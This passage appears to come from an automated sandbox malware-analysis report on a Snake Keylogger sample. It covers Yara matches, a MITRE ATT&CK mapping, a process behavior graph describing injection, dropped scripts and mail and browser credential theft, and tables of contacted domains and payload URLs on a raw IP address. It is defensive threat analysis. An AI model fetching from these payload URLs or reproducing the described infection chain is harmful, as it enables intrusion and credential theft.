                  Source: Yara matchFile source: 0000001A.00000002.3460956266.000000000301B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting                  		Valid Accounts1
                  Windows Management Instrumentation                  		211
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		3
                  Obfuscated Files or Information                  		LSASS Memory24
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		12
                  Software Packing                  		Security Account Manager221
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Masquerading                  		LSA Secrets51
                  Virtualization/Sandbox Evasion                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts51
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Rundll32                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500036 Sample: doc1.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 77 reallyfreegeoip.org 2->77 79 checkip.dyndns.org 2->79 81 3 other IPs or domains 2->81 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 Multi AV Scanner detection for submitted file 2->93 97 14 other signatures 2->97 9 wscript.exe 1 2->9         started        12 doc1.exe 4 6 2->12         started        15 bosotkm.exe 2->15         started        17 3 other processes 2->17 signatures3 95 Tries to detect the country of the analysis system (by using the IP) 77->95 process4 dnsIp5 113 Wscript starts Powershell (via cmd or directly) 9->113 115 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->115 117 Suspicious execution chain found 9->117 20 powershell.exe 43 9->20         started        23 powershell.exe 9->23         started        25 powershell.exe 9->25         started        37 4 other processes 9->37 67 C:\Users\user\AppData\Roaming\bosotkm.exe, PE32 12->67 dropped 69 C:\Users\user\...\bosotkm.exe:Zone.Identifier, ASCII 12->69 dropped 71 C:\Users\user\AppData\Local\Temp\msb.vbe, data 12->71 dropped 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->119 121 Writes to foreign memory regions 12->121 123 Injects a PE file into a foreign processes 12->123 27 wscript.exe 15 1 12->27         started        31 InstallUtil.exe 15 2 12->31         started        125 Multi AV Scanner detection for dropped file 15->125 33 InstallUtil.exe 15->33         started        75 127.0.0.1 unknown unknown 17->75 35 InstallUtil.exe 17->35         started        file6 signatures7 process8 dnsIp9 99 Writes to foreign memory regions 20->99 101 Injects a PE file into a foreign processes 20->101 39 MSBuild.exe 20->39         started        49 2 other processes 20->49 41 MSBuild.exe 23->41         started        51 2 other processes 23->51 43 MSBuild.exe 25->43         started        53 2 other processes 25->53 83 144.91.79.54, 49715, 49718, 80 CONTABODE Germany 27->83 73 C:\Users\user\AppData\...\fNUATsLGslepRpn.vbs, ISO-8859 27->73 dropped 103 System process connects to network (likely due to code injection or exploit) 27->103 105 Windows Shell Script Host drops VBS files 27->105 107 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->107 85 reallyfreegeoip.org 188.114.97.3, 443, 49717, 49721 CLOUDFLARENETUS European Union 31->85 87 checkip.dyndns.com 158.101.44.242, 49716, 49723, 49727 ORACLE-BMC-31898US United States 31->87 109 Tries to steal Mail credentials (via file / registry access) 35->109 111 Tries to harvest and steal browser information (history, passwords, etc) 35->111 45 MSBuild.exe 37->45         started        47 MSBuild.exe 37->47         started        55 6 other processes 37->55 file10 signatures11 process12 process13 57 WerFault.exe 39->57         started        59 WerFault.exe 41->59         started        61 WerFault.exe 43->61         started        63 WerFault.exe 45->63         started        65 WerFault.exe 47->65         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  doc1.exe53%ReversingLabsWin32.Spyware.Snakekeylogger
                  doc1.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\bosotkm.exe53%ReversingLabsWin32.Spyware.Snakekeylogger

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                  https://g.live.com/odclientsettings/ProdV21C:0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  http://schemas.microso0%URL Reputationsafe
                  https://g.live.com/odclientsettings/Prod1C:0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                  https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                  https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://144.91.79.54/2508/file0%Avira URL Cloudsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/file0F?0%Avira URL Cloudsafe
                  http://144.91.79.54/M0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txt0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2508/s0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/v0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtb0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/r0%Avira URL Cloudsafe
                  http://144.91.79.54/;0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/s0%Avira URL Cloudsafe
                  http://144.91.79.54/40%Avira URL Cloudsafe
                  http://144.91.79.54/0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/0%Avira URL Cloudsafe
                  http://144.91.79.54/2508/filewF0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.97.3
                  		truetrue
                    		unknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalse
                      		unknown
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://stackoverflow.com/q/14436606/23354doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://144.91.79.54/2508/filewscript.exe, 00000003.00000003.2327596611.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJdoc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtwscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324272341.0000000005761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2330493341.000000000576E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329957807.00000000030F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netdoc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000035.00000003.3336685881.000001E75A600000.00000004.00000800.00020000.00000000.sdmp, edb.log.53.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://144.91.79.54/Mwscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.ver)svchost.exe, 00000035.00000002.3463466912.000001E75A800000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.orgInstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://144.91.79.54:80/2508/swscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/file0F?wscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/vwscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327347198.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2321571179.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329992171.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327265308.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2313721636.00000000030F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtbwscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/rwscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/2508/swscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.54/;wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.microsowscript.exe, 00000003.00000003.2323886447.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326342412.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://g.live.com/odclientsettings/Prod1C:qmgr.db.53.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netidoc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/2152978/23354doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://144.91.79.54/2508/filewFwscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qdoc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://144.91.79.54/wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
